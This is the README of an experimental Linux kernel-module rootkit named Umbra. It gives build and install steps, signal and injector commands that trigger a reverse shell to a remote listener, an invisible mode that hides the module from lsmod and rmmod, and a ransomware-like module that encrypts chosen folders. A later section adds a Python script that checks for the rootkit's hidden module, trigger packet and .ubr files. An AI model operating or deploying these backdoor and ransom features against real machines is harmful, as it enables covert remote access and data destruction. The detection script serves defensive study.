# Umbra

An LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.

Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more.
The rootkit is still under development, although the features listed below are already fully operational.
Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.
More functionalities will come in later updates.
## Disclaimer

This rootkit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is not intended to be used in a real scenario.

IMPORTANT: If you are going to test this rootkit on your own machine, I strongly recommend using a VM.

About the Umbra Modules: the ransom module uses a trivial encryption mechanism, but it can and will certainly encrypt any folder on your machine. Although files can be easily decrypted, I definitely do not recommend running it against your root folder or similar unless in a controlled environment.
## Installation

Remember that you should have a 4.x or 5.x kernel available. Install its headers:

```shell
apt install linux-headers-$(uname -r)
```

Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using VS Code, you can check .vscode/c_cpp_properties.json for an example of which directories to include.
Clone the project, build it and run the install script:

```shell
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
make
sudo ./install.sh
```
If you have previously run the script and wish to just install Umbra in the kernel, you can run:

```shell
sudo insmod ./umbra.ko
```
## Uninstalling

Make sure Umbra is not in invisible mode, otherwise this will fail.

```shell
sudo rmmod umbra
```
## Usage via signals

```shell
kill -50 1
```
### Reverse shell

Set your desired IP and port in CONFIG.H before building the rootkit (by default 127.0.0.1:5888). Start listening at the remote host:

```shell
nc -lvp 5888
```

Then trigger the reverse shell:

```shell
kill -51 1
```

Note: Umbra also tries to start the reverse shell on load.
### Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

```shell
kill -52 1
```

This reverts the invisible mode if active.

```shell
kill -53 1
```
## Usage via the Umbra Injector

The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.

```shell
./injector -S 127.0.0.1
```

The backdoor listens for packets with the payload `UMBRA_PAYLOAD_GET_REVERSE_SHELL`.

You can also build your own injector using my library RawTCP.
### Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

```shell
./injector -i 127.0.0.1
```

This reverts the invisible mode if active.

```shell
./injector -u 127.0.0.1
```

You can see the full information on how to run the Umbra Injector with:

```shell
./injector -h
```
## Umbra Modules

The Umbra Modules will be stored by the install.sh script in /tmp/umbra, where Umbra will hide them. The directory will not be visible to commands such as ls or similar.

### Ransom module

This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the .ubr extension.

Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.

```shell
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1
```
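The indicators this README describes (a module that no longer appears in lsmod, the `UMBRA_PAYLOAD_GET_REVERSE_SHELL` trigger packet, and the `.ubr` extension left by the ransom module) can be checked for from the defender's side. The script below is an added example and not part of the Umbra project; it assumes that a module which unlinks itself from the kernel's module list still keeps its `/sys/module/<name>/initstate` entry, and the host, capture and file data it scans are constructed samples.

```python
import os

# Indicators named in this README; no Umbra code is used here.
TRIGGER_PAYLOAD = b"UMBRA_PAYLOAD_GET_REVERSE_SHELL"  # packet payload the backdoor waits for
RANSOM_EXT = ".ubr"                                   # extension the ransom module appends


def unlisted_modules(proc_modules_text, sysfs_loadable_names):
    """Loadable modules that sysfs knows about but /proc/modules (what lsmod reads) omits.
    Assumption: a module that unlinks itself from the kernel module list still has its
    /sys/module/<name>/initstate file, so pass the names of /sys/module entries that
    have one (built-in code shows up in /sys/module too, but without initstate)."""
    listed = {line.split()[0] for line in proc_modules_text.splitlines() if line.split()}
    return sorted(set(sysfs_loadable_names) - listed)


def live_unlisted_modules(sysfs="/sys/module", proc="/proc/modules"):
    """Run unlisted_modules() against the real host (Linux only)."""
    with open(proc) as fh:
        proc_text = fh.read()
    loadable = [n for n in os.listdir(sysfs) if os.path.exists(os.path.join(sysfs, n, "initstate"))]
    return unlisted_modules(proc_text, loadable)


def trigger_packets(payloads):
    """Indices of captured packet payloads that carry the backdoor trigger string."""
    return [i for i, p in enumerate(payloads) if TRIGGER_PAYLOAD in p]


def ransom_artifacts(paths):
    """Paths carrying the ransom module's extension."""
    return [p for p in paths if p.endswith(RANSOM_EXT)]


# Constructed sample data standing in for real /proc/modules, sysfs, capture and file-walk input.
SAMPLE_PROC_MODULES = "nf_tables 200704 0 - Live 0x0000000000000000\nxt_conntrack 16384 1 - Live 0x0000000000000000\n"
SAMPLE_SYSFS_LOADABLE = ["nf_tables", "xt_conntrack", "umbra"]
SAMPLE_PAYLOADS = [b"GET / HTTP/1.1\r\n", b"xxUMBRA_PAYLOAD_GET_REVERSE_SHELLxx", b""]
SAMPLE_PATHS = ["/home/user/notes.txt", "/home/user/report.pdf.ubr"]


def report():
    """Combine the three checks over the constructed samples."""
    return {
        "unlisted_modules": unlisted_modules(SAMPLE_PROC_MODULES, SAMPLE_SYSFS_LOADABLE),
        "trigger_packets": trigger_packets(SAMPLE_PAYLOADS),
        "ransom_artifacts": ransom_artifacts(SAMPLE_PATHS),
    }


if __name__ == "__main__":
    print(report())
```

On a live host, `live_unlisted_modules()` replaces the constructed module sample; the payload and path checks take whatever your capture tool and file walk produce.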
## References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used:

How to create LKMs:

Linux syscall reference:

Some rootkit references:

## License

This project is licensed under the GPLv2 license. See LICENSE.